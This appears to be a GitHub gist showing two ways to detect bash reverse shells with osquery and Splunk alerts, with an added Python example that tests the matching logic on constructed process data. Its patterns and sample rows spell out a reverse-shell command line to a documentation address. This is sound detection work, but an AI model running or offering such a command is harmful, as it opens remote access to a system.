@clong
Last active March 11, 2019 21:07

Scenario 1 - Detection logic in osquery, alerting logic on backend (Splunk/ELK/StreamAlert)

osquery.conf

{
  "schedule": {
    "bash_reverse_shell": {
      "query": "SELECT * FROM processes WHERE cmdline LIKE '/bin/bash -i >& /dev/tcp/%';",
      "interval": 30,
      "description": "Looks for processes that resemble a bash reverse shell"
    }
  }
}

Splunk Alert

index=osquery name=bash_reverse_shell

Scenario 2 - Data collection in osquery, detection and alerting logic on backend

osquery.conf

{
  "schedule": {
    "process_events": {
      "query": "SELECT * FROM process_events;",
      "interval": 10,
      "description": "Collect all process execution events via process auditing"
    }
  }
}

Splunk Alert

index=osquery name=process_events columns.cmdline="/bin/bash -i >& /dev/tcp/*"
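As an added example (not part of the gist), both scenarios' matching logic reproduced in Python so it can be exercised offline: Scenario 1's LIKE query is run through sqlite3 (osquery's SQL engine is SQLite, so LIKE behaves the same) against a constructed processes table, and Scenario 2's Splunk wildcard filter is applied to constructed osquery result-log lines in the one-JSON-object-per-line shape osquery's filesystem logger writes. The sample rows and log lines are constructed for illustration, not real telemetry.

```python
import fnmatch
import json
import sqlite3

# Scenario 1: the gist's query, evaluated with sqlite3 against a constructed
# "processes" table (pid, name, cmdline). Rows are made up for this example.
SCENARIO1_QUERY = (
    "SELECT * FROM processes WHERE cmdline LIKE '/bin/bash -i >& /dev/tcp/%';"
)
SAMPLE_PROCESSES = [
    (101, "bash", "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    (102, "sshd", "/usr/sbin/sshd -D"),
    (103, "bash", "/bin/bash -c 'echo /dev/tcp/ is just text'"),
]

def scenario1_matches(rows=SAMPLE_PROCESSES):
    """Return the pids whose cmdline satisfies the page's LIKE pattern."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE processes (pid INTEGER, name TEXT, cmdline TEXT)")
    conn.executemany("INSERT INTO processes VALUES (?, ?, ?)", rows)
    return [r[0] for r in conn.execute(SCENARIO1_QUERY)]

# Scenario 2: backend-side filter over osquery result-log lines (constructed,
# one JSON object per line with "name" and "columns" as the filesystem logger emits).
SAMPLE_RESULT_LOG = "\n".join(json.dumps(e) for e in [
    {"name": "process_events", "action": "added",
     "columns": {"pid": "101", "cmdline": "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"}},
    {"name": "process_events", "action": "added",
     "columns": {"pid": "102", "cmdline": "/usr/sbin/sshd -D"}},
    {"name": "other_query", "action": "added",
     "columns": {"pid": "103", "cmdline": "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"}},
])
SPLUNK_PATTERN = "/bin/bash -i >& /dev/tcp/*"  # wildcard from the gist's Splunk alert

def scenario2_matches(log_text=SAMPLE_RESULT_LOG):
    """Return pids of process_events lines whose cmdline matches the wildcard."""
    hits = []
    for line in log_text.splitlines():
        event = json.loads(line)
        if event.get("name") != "process_events":
            continue  # equivalent of name=process_events in the Splunk search
        cmdline = event.get("columns", {}).get("cmdline", "")
        # Splunk's "*" matches any run of characters, the same as fnmatch's "*".
        if fnmatch.fnmatchcase(cmdline, SPLUNK_PATTERN):
            hits.append(event["columns"]["pid"])
    return hits
```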
